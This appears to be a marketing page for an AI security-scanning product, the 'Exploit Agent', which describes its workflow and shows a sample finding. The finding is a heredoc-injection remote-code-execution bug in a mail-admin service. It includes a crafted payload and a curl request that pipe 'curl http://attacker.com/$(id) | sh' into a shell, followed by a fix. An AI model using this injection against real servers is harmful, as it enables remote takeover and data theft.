An AI security engineer for your lean team.
Connect a repo and the Exploit Agent reasons like an attacker: it indexes the code, builds a threat model, sets 23 specialist workers hunting, then proves each finding with a working exploit. Not a scanner spraying alerts; a teammate who ships confirmed, fixable bugs.
Watch it hunt, the way a pentester would.
From a fresh clone to a confirmed remote-code-execution bug and an open pull request. This is the Exploit Agent reasoning through one run, condensed.
Your whole AppSec posture, on one screen.
This is the dashboard your team signs into: a security score for every repo, what’s open, what’s actually exploitable, and every scan the crew runs, streaming in live.
acme-corp — posture is elevated, 9 critical open.
- Critical96%
- High3725%
- Medium5839%
- Low3222%
- Info128%
A continuously updating feed of simulated findings and scan events across the connected repositories.
Simulated data · product preview
Your whole app. One security engineer. Maybe.
Lean teams ship faster than they can review. Pentests are a once-a-year snapshot; scanners drown you in maybes that someone still has to read. The gap between “code shipped” and “code checked” is where breaches live.
Too much surface
Every route, dependency and workflow is attackable, and it grows with each merge.
Too few people
Most teams have no dedicated AppSec engineer, let alone one per repository.
Too much noise
Traditional scanners pattern-match and cry wolf. The real bug hides in the false-positive pile.
Connect a repo. Point it at what matters.
Connect GitHub, pick a repository and branch, then choose how deep to go. Run a full scan, or just open a session and ask, in plain language, for exactly the classes you care about. The agent works on precisely that.
Simulated data · product preview · pick a starter prompt to run the crew
Repo config
Branch, investigation depth, full-scan or interactive, review scope before the run, and model selection.
Interactive session
Ask for specific vulnerability classes in plain language; the agent works on exactly that.
Smart scope
Auto-deselects example, test and non-shipped code, focusing on what actually ships. Narrow to folders when you want.
Live exploitation (beta)
Point it at a sandboxed deployment to safely validate impact end-to-end.
It reads your code before it hunts.
The agent indexes the shipped application code and builds a threat model, assets, trust boundaries, entry points and the classes most likely to bite. Every worker that follows hunts this map, not a generic checklist.
A planned team of specialists, not a scanner.
A planner agent decides who works. Twenty-three specialist workers, each an expert in one bug class, hunt in parallel and emit candidates. Breadth no single reviewer could hold in their head, running at once.
A validator kills the noise.
Every candidate is re-read in batches of ten. The validator checks for framework defences, ORM prepared statements, template auto-escaping, auth middleware, and confirms or rejects each one with a written reason. This is why the results are worth reading.
Not “maybe”, here’s the exploit.
A confirmed finding lands with everything an engineer needs to fix it and a reviewer needs to trust it: the vulnerable line, a working exploit, the impact, and a code-level fix ready to open as a PR.
The transaction() function in psql-runner.ts constructs a bash heredoc command string to pipe SQL statements to psql over SSH. The heredoc uses the fixed delimiter __EXAMPLE_SQL_EOF__. The SQL body passed into the heredoc is built by joining caller-supplied SQL strings — including values derived from the user-controlled name field of a new mailbox. If an attacker embeds a newline followed by __EXAMPLE_SQL_EOF__ in the display name, the heredoc is terminated prematurely and any text after it is executed as an arbitrary shell command on the mail server, running as the postgres user (via sudo). This is a direct path to RCE, and it can be triggered by any low-privileged user of the same organisation who is able to create a mailbox — no admin role is required.
The vulnerable heredoc construction is at psql-runner.ts:169:
1// psql-runner.ts (apps/api/src/modules/mail/admin) · lines 160–172 2export async function transaction( 3 serverIdOrExec: string | CommandExecutor, 4 statements: string[], 5): Promise<void> { 6 const body = ["BEGIN;", ...statements.map((s) => s.replace(/;?\s*$/, ";")), "COMMIT;"].join("\n"); 7 8 // VULNERABLE: body is interpolated directly into the heredoc. 9 // If body contains "\n__EXAMPLE_SQL_EOF__\n", the heredoc closes early 10 // and anything after it is executed as a shell command. 11 const cmd = `sudo -u postgres psql -d vmail -A -t -v ON_ERROR_STOP=1 <<'__EXAMPLE_SQL_EOF__'\n${body}\n__EXAMPLE_SQL_EOF__`; 12 13 await runCmd(serverIdOrExec, cmd); 14}
The body variable is assembled from statements, which include SQL built from input.name in mailboxes.service.ts:174:
1// mailboxes.service.ts · lines 170–182 2await transaction(exec, [ 3 buildInsertMailboxSql({ 4 username, 5 passwordHash: hash, 6 name: input.name ?? "", // <-- user-controlled display name 7 domain: input.domain.toLowerCase(), 8 quotaMB, 9 storagebasedirectory: layout.storagebasedirectory, 10 storagenode: layout.storagenode, 11 maildir: layout.maildir, 12 }), 13 buildInsertSelfForwardingSql(username, input.domain.toLowerCase()), 14]);
The q() function (psql-runner.ts:39–41) only escapes single quotes (' → ''). It does not escape newlines. So a name value such as x'\n__EXAMPLE_SQL_EOF__\ncurl http://attacker.com/$(id)|sh\n#, after q() wrapping, produces a SQL string literal that contains a literal newline and the heredoc terminator — breaking out of the heredoc and injecting a shell command.
Precondition. The attacker is a low-privileged user of the same organisation with permission to create a mailbox — no admin role or elevated API token is required.
- Attacker identifies the mailbox-creation endpoint, e.g.
POST /admin/mailboxes. - Attacker crafts a
namefield containing an embedded newline, the heredoc terminator, and a shell payload:
innocent name __EXAMPLE_SQL_EOF__ curl http://attacker.com/$(id) | sh #
Then the attacker sends the request:
1curl -X POST https://<target-host>/admin/mailboxes \ 2 -H "Authorization: Bearer <org-user-token>" \ 3 -H "Content-Type: application/json" \ 4 -d '{ 5 "localPart": "pwned", 6 "domain": "example.com", 7 "password": "Hunter2!", 8 "name": "innocent name\n__EXAMPLE_SQL_EOF__\ncurl http://attacker.com/$(id) | sh\n#" 9 }'
- The server calls
transaction(), which interpolates the name (via the SQL built bybuildInsertMailboxSql) into the heredoc body. - The shell sees
__EXAMPLE_SQL_EOF__on its own line, closes the heredoc, and executescurl http://attacker.com/$(id) | shas thepostgresuser (viasudo -u postgres). - The attacker receives a callback with the output of
idand can execute arbitrary commands on the mail server.
Any low-privileged member of the same organisation can execute arbitrary shell commands on the mail server as thepostgres user (via sudo). This gives full control of the mail database and, depending on the sudo configuration, potentially full root access to the mail VPS. All mailbox data, credentials, and mail content are at risk of exfiltration or destruction.
Do not interpolate untrusted data into a heredoc body. Pass SQL to psql via a temp file written with a random name, use psql’s -c flag for single statements, or pipe via stdin without a heredoc. If the heredoc approach must be kept, validate that no statement contains the delimiter before constructing the command, and use a randomly generated delimiter that cannot be predicted or injected.
1// Before (psql-runner.ts:169) 2const cmd = `sudo -u postgres psql -d vmail -A -t -v ON_ERROR_STOP=1 <<'__EXAMPLE_SQL_EOF__'\n${body}\n__EXAMPLE_SQL_EOF__`; 3 4// After: write SQL to a temp file with a random name, then execute 5import { randomBytes } from "crypto"; 6const tmpFile = `/tmp/example_sql_${randomBytes(16).toString("hex")}.sql`; 7// Upload body to tmpFile via SFTP/exec, then: 8const cmd = `sudo -u postgres psql -d vmail -A -t -v ON_ERROR_STOP=1 -f ${tmpFile}; rm -f ${tmpFile}`;
Alternatively, assert no statement contains the delimiter before use:
1// Defensive guard (belt-and-suspenders, not a replacement for the above) 2const DELIM = "__EXAMPLE_SQL_EOF__"; 3if (statements.some(s => s.includes(DELIM))) { 4 throw new Error("SQL statement contains forbidden delimiter sequence"); 5}
- Exploit, spelled out
- Location, category, confidence, a code-level explanation and exactly how an attacker exploits it, with a concrete curl command, HTTP request or exploit URL.
- Code-level remediation
- Impact plus a specific fix, ready to open as a pull request.
- CVSS you control
- Adjust the score if the agent over- or under-claimed; your correction becomes org-wide knowledge.
- False-positives that learn
- Mark a finding false with a reason and the org knowledge base fact-checks similar findings next time instead of repeating.
The whole software-supply picture.
The same investigation covers everything around the code, then hands off to live pentesting when you want it proven against something running.
Dependencies & CVEs
A CVE-verification agent runs reachability analysis, is the vulnerable path actually reachable?, and flags supply-chain risk with a written verdict.
Secrets
Secret detection across the codebase, including older commits in history.
IaC, headers, SBOM & EOL
Infrastructure-as-code and header issues, SBOM export, and end-of-life component detection.
Code quality
Lint, complexity, dead code and documentation gaps.
Wiki & codebase context
Auto-generated architecture wiki, dataflow diagrams, entry points, dangerous sinks and auth/authz flows, per module and per repo.
GitHub Actions
Scans your CI/CD workflows for insecure configuration.
It maps the whole codebase, not just the bug.
A context agent indexes every shipped file into a reusable map, entry points, dangerous sinks, auth and access patterns, so the next scan starts already knowing your code.
Every repo gets a wiki that writes itself.
A wiki agent documents the whole codebase, architecture, dataflow, core components, workflows and security, and keeps it current on every scan.
Cal.diy is a self-hosted, MIT-licensed scheduling platform built on Next.js, tRPC, React, Prisma and PostgreSQL. It is organised as a Yarn monorepo whose app-store package plugs 50+ third-party services — calendars, video, CRMs, payments and analytics — into the core booking flow.
- Introduction & Architecture
- High-Level Data Flow
- Core Components
- Data Model & API
- System Workflows
- Error Handling & Security
- Summary
From plausible to proven, in a sandbox.
Turn on live exploitation and the agent runs its findings against a sandboxed deployment, safely firing the actual exploit and keeping a full verification log. A finding stops being an argument and becomes a fact.
It thinks like the attacker, not the linter.
Scanners match patterns and hope. The Exploit Agent reasons from a threat model to a working exploit, and learns from your team as it goes.
- Hacker’s mindset
- Starts from a threat model and attacker goals, not a rule list, so it finds logic and chained bugs scanners miss.
- Proof, not probability
- Every finding is validated, and optionally exploited live. No triage pile.
- Defence-aware
- Understands the frameworks in your stack, so it stops crying wolf at safe code.
- Learns your org
- CVSS corrections and false-positive marks become shared knowledge across every future scan.
- End to end
- Code, dependencies, secrets, IaC and CI/CD, one investigation, one report.
- Part of the constellation
- Hands findings to the Attack Surface and Network agents to show real blast radius.
Priced by outcomes. Never by seats.
VenusHawk isn’t sold by the developer. There are no seats to buy, no minimum order, and no cap on how many engineers touch the code. You equip one agent with your repositories and pay only for the work it does, in VenusHawk Credits, as you go.
Priced by headcount
- Pay per developer seat, used or not
- Minimum seats and annual lock-in
- Every engineer you add inflates the bill
- Idle licences, wasted budget
Priced by work done
- One agent, equipped with all your repositories
- Pay as you go, credits, never seats
- No minimums, no cap on developer seats
- Your bill tracks how hard you put the agent to work
The more of your ecosystem you hand it, the more it finds, and you only ever pay for that work. Outcome‑oriented, not licence‑oriented.
They work better together.
Every agent feeds the same brain. Findings here correlate with the rest of the constellation.
Bring this agent into your constellation.
VenusHawk is rolling out to lighthouse customers and design partners. Tell us a little about your environment and we’ll see how we can accommodate you.
